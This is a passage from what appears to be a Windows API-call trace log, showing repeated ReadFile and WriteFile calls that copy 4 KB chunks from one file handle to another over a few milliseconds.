lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.689] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.689] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.690] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.690] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.690] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.690] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.691] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.691] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.691] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.691] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.691] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.691] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.691] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.691] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.692] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.692] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.692] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.692] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.692] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.692] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.692] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.693] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.693] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.693] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.693] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.693] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.693] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.694] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.694] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.694] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.694] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.694] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.695] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.695] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.695] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.695] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.695] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.695] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.695] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.696] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.696] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.696] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.696] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.696] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.696] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.696] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.697] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.697] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.697] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.697] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.697] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.697] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.698] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.698] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.698] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.698] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.698] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.698] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.698] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.698] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.699] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.699] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.699] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.699] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.699] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.699] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.699] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.700] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.700] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.700] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.700] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.700] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.700] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.700] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.701] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.701] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.701] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.701] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.701] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.701] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.701] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.701] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.702] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.702] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.702] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.702] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.702] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.702] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.702] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.702] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.703] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.703] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.703] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.703] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.703] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.703] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.704] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.704] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.704] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.704] WriteFile (in: hFile=0x428, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.704] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.704] 